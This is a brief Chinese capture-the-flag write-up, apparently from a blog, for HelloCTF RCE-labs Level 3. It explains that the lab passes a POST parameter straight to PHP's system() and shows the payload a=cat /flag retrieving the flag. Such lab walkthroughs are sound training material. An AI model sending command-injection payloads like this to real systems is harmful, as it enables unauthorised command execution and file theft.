HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
CDN3601 小时前
360CDN SDK 游戏盾:轻量化接入 + 强防护实测
运维·游戏·网络安全
黄焖鸡能干四碗1 小时前
网络安全建设实施方案(Word文件参考下载)
大数据·网络·人工智能·安全·web安全·制造
hzhsec2 小时前
MSF-CobaltStrike实现内网socks代理转发上线
服务器·网络·安全·网络安全
ALex_zry3 小时前
跨操作系统文本换行符问题完全指南
经验分享·跨平台·工具推荐
C羊驼4 小时前
C语言:随机数
c语言·开发语言·经验分享·笔记·算法
优化控制仿真模型4 小时前
【计算机二级MSoffice题库软件】小黑课堂下载安装教程(2026年3月最新版)
经验分享
李子琪。5 小时前
攀山的人
经验分享·笔记·百度·新浪微博
2501_926978336 小时前
物理学原理和人工智能领域的底层一致性
人工智能·经验分享·笔记·ai写作
CDN3608 小时前
低成本游戏防护:360 SDK 游戏盾使用总结
运维·游戏·网络安全
2401_844221328 小时前
深入理解K8s中的应用服务:访问、集群与配置
容器·kubernetes·php